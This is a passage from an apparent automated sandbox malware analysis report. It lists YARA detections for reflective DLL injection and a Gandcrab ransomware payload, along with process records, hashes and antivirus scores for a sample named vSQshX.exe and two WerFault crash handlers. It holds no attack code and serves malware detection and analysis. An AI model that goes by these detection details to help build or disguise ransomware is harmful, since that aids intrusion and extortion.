                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000000.324233119.0000000003760000.00000008.00000001.00040000.00000003.sdmp, Author: kevoreilly
                                  Reputation:low

                                  General

                                  Target ID:1
                                  Start time:23:41:21
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  Imagebase:0xc20000
                                  File size:15872 bytes
                                  MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 76%, Metadefender, Browse
                                  • Detection: 100%, ReversingLabs
                                  Reputation:moderate

                                  General

                                  Target ID:4
                                  Start time:23:41:29
                                  Start date:31/08/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 532
                                  Imagebase:0xdf0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:6
                                  Start time:23:41:38
                                  Start date:31/08/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 1432
                                  Imagebase:0xdf0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  No disassembly